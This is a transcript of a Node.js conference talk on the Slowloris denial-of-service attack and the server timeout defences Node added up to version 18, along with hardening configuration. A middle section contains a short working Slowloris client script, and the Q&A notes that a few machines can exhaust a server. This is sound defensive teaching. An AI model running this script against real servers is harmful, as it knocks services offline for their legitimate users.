Web applications are commonly vulnerable to several Distributed Denial of Service attacks, sometimes in unexpected ways. An example is the SlowLoris attack, an exploit that leads to service interruption by simply sending data to the server as slowly as possible. In this talk I will tell the tale of how it took almost 13 years for Node to be completely protected from the SlowLoris attack. I will also show that sometimes prioritizing performance can lead to incorrect fixes that result in a false sense of protection.
The tale of avoiding a time-based DDOS attack in Node.js
From:

Node Congress 2023
Transcription
I promise I will change this title because it's definitely too long, but let me put it into a short, catchy sentence: sometimes your worst enemy is just a slow loris. You don't believe me now, but by the end of the talk you will, and you will be amazed at how this happened.

First of all, let me briefly reintroduce myself. For people who ask where I come from: that little tiny dot there, in the center of South Italy, and I can tell you that the rest of Italy does not acknowledge our existence. My region is completely forgotten; don't ask me why. As I said, I'm a Staff DX Engineer at NearForm and co-founder and principal architect at Orama. What are these companies? NearForm is a professional services company, fully remote. We are always looking for new talent, so if you're interested, come say hi to me after this talk. We are 300 people and counting, and unfortunately you cannot escape from us on npm: our packages see one billion monthly downloads, 8% of the total. So, unfortunately, you cannot escape. As for Orama, we plan to do just one simple thing: search everywhere, wherever you can run JavaScript. We are trying to reinvent the text-search industry using just JavaScript while staying open source. Once again, if you're interested, come say hi to me later, or to my co-founders Michele and Angela; we are outside.

Let's get to the meat. Nowadays we use more and more web applications, and they are very important to everything we do. They range from critical areas like telemedicine, online banking, or national security to topics that might be thought of as trivial, like social networks, messaging, and so forth. I say might be called trivial because, if you think about accessibility and inclusion, for some people, like the elderly, WhatsApp might be the only way to talk to their nephew. So if WhatsApp is down, you cut them off from a very important part of their communication. All these applications simply can never go down. That's not allowed to happen.

Which brings us to another problem: we are always, all of us, vulnerable. No matter how smart you think you are, no matter how many people work on security in your company, remember that there will be ten more people outside trying to waste your time, mess with your application, and bring it down. Unfortunately, they always outnumber you.

And this brings us to one category of attacks which is usually well known. Please raise your hand if you know about DoS attacks. And raise your hand if you know about DDoS attacks, the distributed variant. Okay, pretty much the same people. In short, a denial-of-service attack is the kind of attack where a network resource is maliciously made unavailable to its intended users. The application is not breached by the attacker; it is overwhelmed by requests. The distributed version, the DDoS attack, which is what I will focus on from now on, is a variant where the malicious traffic comes from several sources across the web, which makes it much harder to fight, for reasons we will see in a bit.

Now, up to a few years ago it was common understanding that in order to run a DDoS attack, the attacker must use a lot of resources from several sources across the globe. Please raise your hand if you think this is still true, that in order to run a DDoS attack you have to use a lot of resources. Okay. That's kind of true and kind of not, and I will show you in a bit why.
Because first of all, let me introduce you to your real enemy for today. This is the most terrifying animal I've ever seen in IT. This guy. This guy is terrifying, and when I tell you why, you will say: okay, this is amazing. This is the slow loris, and it's a very, very, very small and slow animal. By definition, it moves very slowly. If you know the movie Zootropolis, there is the DMV scene, if you know what I'm talking about. Think about something like that. That will kill you.

That's exactly what we are going to talk about now, because we are focusing on an attack called the Slowloris attack. It is a DoS attack which uses, contrary to what you might think, very minimal bandwidth, close to nothing, which is just amazing. This attack was created by Robert Hansen in 2009, and here is something I would add to what I found online when researching it: technically speaking, it's not only about HTTP. I don't know why, but if you look online for the Slowloris attack you only find its HTTP implementation, probably because HTTP is the most used protocol. In my opinion, when you analyze how this attack works, it can be extended to any protocol that runs over TCP and has no good timeout handling. If you do it like that, you can bring any server down. And remember, it can take a single machine to bring everything down.

Let's start by analyzing how things usually work in HTTP. When we talk about an HTTP server, what usually happens is that a client connects to the server: that's the solid black line. Then it sends a request, the solid red line, and receives a response, the solid green line. That's the normal flow. For this example we can assume that each socket consumes the same amount of RAM and other system resources on the server. Usually that's the case; depending on which media you use it might not exactly be, but we can assume it is. Then a second client does the same, and by the time that second request arrives, we can assume the first client has disconnected. I see your objection: that's not true with keep-alive, because of course a client can stay connected and eventually send multiple requests on the same socket. But just for the sake of the example, let's say the first client disconnects at some point. So over the course of time, with a second, third, fourth, fifth client, the number of sockets and resources in use on the server, forgetting about temporary spikes, stays roughly constant. That's our assumption, and it usually holds true: if you look at the graphs in any log-watching application, you'll see that network traffic is relatively stable.

The thing you likely never consider is that retaining a socket on the server is expensive. First, there is network handling at the operating-system layer, which means some RAM of your system is used just to keep that connection open. Then, if you are on UNIX, that network resource is linked to a file descriptor, because in UNIX everything is a file descriptor; we know the rule. The file descriptor that is created counts against your process's ulimit. Please raise your hand if you know what ulimit is. Okay, let me answer that.
In short, ulimit is a system parameter that specifies how many file descriptors your process can open. A process usually starts with a pretty low limit, 1024, and the user can raise it to be unlimited. The problem is: what does unlimited mean? Unlimited for the single process, but system-wide the number of file descriptors is still finite. So your process can eventually take all the available file descriptors, and at some point there will be no file descriptors left for anybody, including your process. And that's a problem. Finally, when we exit the operating-system layer, we get to the application layer. Node, for instance, in order to keep a socket open, needs a lot of callbacks, streams, and so forth related to that single socket. Once again, a lot of RAM. At some point this RAM will run out. We always talk about virtual memory, but there is physical RAM that at some point will simply be exhausted. That's the problem.

And that brings us to the Slowloris attack. The Slowloris attack is pretty unique because each client connects and never finishes the request. In this case, as you can see, the red line is dashed, and by dashed I mean an incomplete request: the clients never send the last byte. And as you can see, there is no green line, because the server can never receive the full request and send a response. Over the course of time, more and more clients keep connecting and never disconnect, and this leads to service interruption, because at some point the server will not be able to accept new connections, due to lack of file descriptors, or RAM, or both. What is the problem here? If you look at the logs in your monitoring system, you will see no bandwidth. You will probably only see a fall in outgoing bandwidth, because the server is not able to respond anymore, but the incoming bandwidth will be close to nothing. So you really cannot set any alarm, because it's nearly impossible to distinguish whether nobody is connecting or somebody is connecting but never sending data. Which is a horrible mess.

Which brings me to a very simple question: how do we stop it? And this is where things get horrible, because, in short: first of all, if you're using Node or a similar platform, please don't put it directly in contact with the public. Always have a reverse proxy, an API gateway, or something like that in front, because those pieces of software are better suited for the job of preventing this kind of attack. Node and similar tools are general-purpose tools, so they are not specialized for this. So don't do that. But if you have to, for any reason, I can unfortunately tell you that none of the strategies you can possibly implement will be accurate. The reason is that there are two main ways to stop a DDoS attack. The first one is a temporary move: ban the offending IPs for a while. On its own this makes little sense, because we all know how easy it is to spawn a new instance on any cloud and get a new IP, but as temporary relief it might work. Long term, you have to have good speed enforcement or timeout handling, which is usually the easiest technique to implement. And it poses a problem of inclusion: if you say, for instance, "I consider all clients slower than five seconds to be attacking", you are cutting out people who have a poor network connection and are legitimate clients.
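To make the attack concrete, here is a minimal sketch of what such a slow client looks like, written in Node itself. It is purely illustrative, assumes a test server of your own listening on localhost:3000, and should only ever be pointed at machines you own:

```js
// Slowloris pattern, minimal sketch: open many sockets, start an HTTP
// request on each, and never send the blank line that terminates the
// headers. Each socket pins RAM and a file descriptor on the server.
const net = require('net');

function slowClient() {
  const socket = net.connect(3000, 'localhost', () => {
    // An incomplete request: the headers are never closed by "\r\n\r\n".
    socket.write('GET / HTTP/1.1\r\nHost: localhost\r\n');

    // Trickle a harmless header every 10 seconds: just enough traffic
    // to defeat a naive "idle socket" timeout.
    setInterval(() => socket.write('X-Padding: 1\r\n'), 10_000);
  });

  // The server eventually dropping the socket is expected, not an error.
  socket.on('error', () => {});
}

// A few hundred such clients are enough to exhaust a small server.
for (let i = 0; i < 100; i++) slowClient();
```

Note how little bandwidth this uses, a few bytes per socket every ten seconds, which is exactly why the attack is invisible on a bandwidth graph.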
So you must know your clients and you must know your application's use case, and based on that you can choose your timeout threshold, which you can then monitor and change incrementally. This will inevitably cut out a certain share of users who are legitimate, and you have to know your risk, unfortunately. You can never be 100% accurate.

Now, what about Node? How is Node handling this Slowloris attack, and how can we protect ourselves? First of all, Node was almost completely unprotected up to 2018. Even though Slowloris had been out since 2009, and so had Node, and Node included an HTTP server from its very first version, it had no effective timeout handling. The only timeout handling available before version 10.14 was the socket timeout, which is the amount of time a socket can stay completely idle, meaning not sending any byte, before getting shut down. That was the only timeout. In Node 10.14, http.Server's headersTimeout was introduced, which establishes how much time each client has to send the entire set of request headers. Now, why only the request headers? Because in Node we never deal with, consume, or time out the body. That was an initial design decision: body handling is delegated to the application layer, which is Express, Fastify, whatever you want. Now raise your hand if you think these frameworks implemented proper timeout-handling logic. You've been in IT a long time... okay, I appreciate that. Unfortunately, that was a problem. So in Node 10.14 there was an initial protection, at least on the headers part, but the body was still left out, so it was basically not effective as a protection.

The situation even got worse when we released Node 13.0.0 one year later, where we disabled the timeout I was speaking about earlier, the idle timeout. That timeout became disabled by default, rather than enabled by default. The reason was to be more friendly to serverless environments that need long-running, and therefore usually idle, connections. So we disabled it, and once again we trusted the frameworks to properly implement timeout handling. I won't ask you to raise your hands again, but you get the idea. Unfortunately, there was no proper handling by all the frameworks: Fastify and Restify implemented a proper fix, but Koa and Express did not, and that was a big problem.

Then one year later, in Node 14, we got better protection: http.Server's requestTimeout. As the name suggests, it is a way to enforce a complete timeout on the entire HTTP request. It was made available on all active release lines, but unfortunately it was disabled by default. The reason is that it was introduced in a semver-minor change, so it could not be enabled by default, because that would have been a backward-incompatible change. So that was a problem. Are we safe? Raise your hand if you think yes. Okay, you know how this works by now. Amazing. We were only almost protected. The countermeasures we had back in Node 14 were loose, because custom configuration was needed in order to be protected: you had to re-enable all the timers that were disabled by default, unfortunately. And there was a prioritization of performance when implementing the check, which I will come back to in a minute. Basically, the problem was that the timeout was only checked after receiving the next byte.
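Concretely, here is how those timeouts can be re-enabled on a plain Node HTTP server. This is a sketch using the values recommended in the talk; tune them to your own clients:

```js
// Hardening an HTTP server on Node 16 and below by re-enabling the
// timeouts that are disabled (or too loose) by default.
const http = require('http');

const server = http.createServer((req, res) => {
  res.end('hello');
});

// Maximum time a socket may stay completely idle (disabled by default
// since Node 13): two minutes.
server.timeout = 120_000;

// Maximum time to receive the entire request, headers and body
// (disabled by default before Node 18): five minutes.
server.requestTimeout = 300_000;

// Maximum time to receive the request headers: one minute.
server.headersTimeout = 60_000;

server.listen(3000);
```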
So now, do we want to make a guess on why this check-on-the-next-byte logic might be flawed in the case of Slowloris? Anyone? Okay. That's the point, that's exactly the point. It kind of works for a very fast attack. But in a slow, Slowloris-like attack, you never receive the next byte. So waiting for the next byte to check whether you should have received it earlier makes little sense, right? But it was the fastest way to implement timeout checking.

Anyway, let's start small. Let's say we are on Node 16 or below. How do we protect a Node application in the right way? First of all, make sure that the socket cannot stay idle, so re-enable server.timeout. Limit the time for each request, so enable server.requestTimeout. And also re-enable headersTimeout with a lower value. That's the way to protect Node 16, 14, and 12. But please update to at least 16, do us a favor, because the other two are end-of-life. The sketch above is an example: you can just copy those values. Two minutes for the socket to be idle, five minutes to receive the entire request, which is a lot, and a headers timeout of just one minute. This way, if your server can resist for five minutes, it will resist the attack. That's the idea.

I can tell you that with the release of Node 18.0.0 we are finally safe by default. Why is that? Because the requests are checked periodically: there is a new option, and every so many seconds, 30 by default, we check all the sockets (a sketch of tuning this option appears below). To do this, a connection list was implemented, because before Node 18 we did not maintain a list of the sockets connected to the HTTP server, so we could not make this kind of check. We implemented it in Node 18, and every 30 seconds we check all the sockets, no matter whether we have received new data or not, and we cut off the expired ones. We also have safer defaults. Easter egg: the values I showed you earlier are the defaults on Node 18. You can set them on a Node before 18, but on Node 18.0 they finally are the defaults, which makes things easier. So Node 18 is protected by default against Slowloris. We finally made it. We are finally secure on that front.

Take-home lessons: what can we learn from this? First of all, always think about security: it comes first, before performance. You can sacrifice performance, and eventually, if you do that and change your mindset, you might even get performance gains for free. When I implemented the connections-checking interval, I got a 2% improvement, totally unexpected. I was not even looking for that; somehow I got it. Don't ask me how, I never checked, I was just happy with it. Also, regularly validate what you are doing, because you might find code that another person wrote in very good faith but with implementation flaws, or they were just tired; so always recheck what you are doing. And finally, one thing I always like to do in my talks is to end with a very, very smart quote from someone else. In this case I'm quoting William Safire, who said: never assume the obvious is true. In my own words: please, please, please use common sense everywhere. This is usually forgotten, and you know it. Use common sense in all your life, working and non-working. Questions in a bit, and thank you very much. That's it.

People do think about security without necessarily having the knowledge of how to implement it or the practices around it. You gave some take-homes, which were good starting points for the thought processes you should establish.
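For reference, on Node 18 the periodic connections check mentioned above can be tuned when creating the server. A minimal sketch, where the 10-second interval is purely illustrative (the default is 30 seconds):

```js
// Node 18+: expired sockets are reaped by a periodic sweep over the
// server's connection list, instead of being checked only when the
// next byte arrives.
const http = require('http');

const server = http.createServer(
  // Sweep the connection list every 10 seconds instead of the default 30.
  { connectionsCheckingInterval: 10_000 },
  (req, res) => res.end('hello')
);

// On Node 18, requestTimeout (300 seconds) and headersTimeout (60
// seconds) are already safe defaults, so nothing else is needed for
// Slowloris protection.
server.listen(3000);
```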
I'm curious if you see any common mitigations that developers believe in but that may end up doing more damage than good.

I mean, there is one which is not really coupled to security only, it's coupled to everything, and it's one single term: over-engineering. People sometimes over-engineer stuff, and that might do harm or even completely kill performance. If you start over-engineering looking just at security or just at performance, you might kill the other one, and that's when you kill your application. If an application is secure but not usable, for instance, switching to the front end, if you have to log in every five minutes, nobody is going to use it. So whether it's secure or fast doesn't matter anymore, because the UX is unusable. So always remember security, performance, and usability together. There is a triangle, and people usually think about keeping just two out of the three vertices; in this case we have to try to keep all of them. That's the idea. Oh yeah, easy, right? At least let's struggle for it. I'm not saying it's always possible, but let's struggle to keep all three vertices of the triangle.

Excellent. We have quite a few questions; I will quick-fire them in the time we have. How does Nginx protect your server from Slowloris?

To be honest, I have no idea, but I know it does. The thing is that the only way to protect against Slowloris is proper timeout handling; that's the only way. So I guess Nginx has better timeout handling, more suited for the job. The big difference is that Node has to provide a complete platform, while Nginx is focused on just that job. And I assume that, now or in the future, if a new attack comes out, Nginx will have a faster pipeline to get to a proper protection. Because in Node, for instance, we have to worry about HTTP and crypto at the same time, while Nginx only focuses on HTTP, so it will be faster to protect against new attacks as they come out. That's the idea.

Yeah, awesome, thank you. Is there a method to mitigate Slowloris attacks for WebSockets?

It's the same. In the case of WebSockets, it's the same technique. Of course, you probably have to enforce higher timeouts, because it might be that the WebSocket is not used for a while, since you're just idling. But when a new message starts, for instance, you enforce a hard timeout: now the message has to reach the other end eventually, at the protocol level. And you also enforce an overall, possibly very long, timeout for an idle socket. Let's say that after an hour you can assume the client is not doing anything and shut it down. Maybe an hour is too much, but once again, knowing your application is the key there.

Yeah, there's a bunch of questions about magic numbers; we'll get to those in due course. But first, the next question: are there any similar major vulnerabilities still hurting us, even with the latest Node version?

Not that I'm aware of. There might be, but at the moment I'm not aware of any. I might be wrong, so don't trust me: double-check. Don't trust me; no, no, I don't even trust myself, folks. So double-check whatever I say.

Kind of similar, on the other side: is Slowloris still the most common DDoS attack nowadays? Or are there other forms of popular attack that people should be aware of and mitigate for?

You can basically split the attacks into two sides. There is Slowloris, which uses minimal bandwidth.
And there are several kinds of attacks that just hammer your server, maybe with connection attempts, or by just sending too much traffic, and so forth. Those are the two major categories: you can either be slow or fast. If you are average, you're just a regular request, it doesn't matter. That's probably the answer to that.

Audience question: I said "Nginx"; is it "N-ginx" or "engine-x"? I've always said "engine-x". Nods, nods. Excellent. Thank you so much, team. So, should we keep the safety measures that you recommended in Node even when we're running it behind an Nginx setup, for example?

Yes, absolutely. Absolutely. The reason is that, as I told you, I'm not sure whether Nginx protects from Slowloris, so why remove one additional layer of protection? Most of the time these timeouts will never fire, so you don't have any issue; it does no harm to leave them enabled. Especially because all the timeouts I showed earlier were previously implemented with separate setTimeout and setInterval calls internally in Node, while now they are implemented on top of the single periodic connections check. And if a socket finishes its request before the checking interval goes by, it will not even be checked, so you get that for free. So there's no reason to disable them on Node 18. If you are on Node 16, you might think twice, but since these timeouts are so high, they will almost never fire, so you're probably fine. One piece of advice, though: Node 18 is going LTS in October. Update. You know what I'm saying: update.

We have a couple of questions which are kind of similar; I'm going to combine them in the interest of time, but I'll read both in full. How big are the performance impacts of checking all requests in Node 18 plus? Is there a golden value for the checking interval? And a similar question: one minute seems like a really long time for a headers timeout. In your experience, what could be good numbers for real-world examples?

It is a huge timeout, and that's by design. Remember that Node is a general-purpose tool, so we have no idea what you're doing in your application; we set defaults that most likely will not impact people and will keep them safe. But if you know that your clients are very fast, you can lower it, even down to 10 seconds. One additional thing I have to add here: know your application and know your clients. In this case I'm not talking about knowing your clients to market the hell out of them; it's on the technical side. If you know that your clients are desktop-only, you can assume they have a fast connection, for instance. If you know they are mobile-only, you must have higher timeouts, because their connection might be sloppy sometimes. Our defaults are so generous that they will probably not impact anybody, but never lower them blindly.

Thank you. A couple more. This one is ambiguous; it could be about the attack or the defense. How does this work with handling file uploads and multipart form data?

Know your application. If you know that your users upload 5 GB files, allow an hour before timing out. Once again, this timeout of course won't help someone who has to upload a 10 GB file over a 3G network; that can never work. But if you know that your users must do that, allow them higher timeouts. For instance, I don't know how S3 works internally, but I'm pretty sure that the S3 upload endpoint has higher timeouts than the download one, for sure.
Otherwise it would never work. It's just common logic. Once again: use common sense, folks. That's the best advice I can give you.

Last question, then. Usually there's a limit on the number of allowed simultaneous connections to a server across the board. So, does Slowloris still require a distributed network in order to work?

Yes. But the thing is that... well, not strictly. Let's put it this way: if your client is more powerful than the target server, you might just need a single client. If the server goes down, in terms of RAM and sockets, before your client runs out of sockets, and from a single IP we are talking about something like 65K sockets, then you just need a single client. It depends on what you're attacking and on what you're attacking it with.

Yeah, but by the nature of it, it's about who runs out of resources first. You would need more nodes in order to...

But it's pretty easy. Let's say the server is just a regular server, and the client is a new laptop: on the server we have AMD CPUs, on the client we have the M2 chips, which are very powerful. If you have a good network, maybe two M2 MacBooks can take down an AMD machine. It depends on how the machine is configured, it depends on the environment; there is no golden rule. Usually, typically, it takes a lot of resources. But consider that the network is not one of those resources: you can just spin up EC2 machines, let them open the sockets, and do nothing. That's it. Eventually, I hope Amazon will notice that you're opening sockets without doing anything, but that's another topic. That's completely another topic.

Can we all give a massive round of applause to Paolo? That was absolutely fascinating. Thank you so, so much.

Thank you very much. Thank you so much.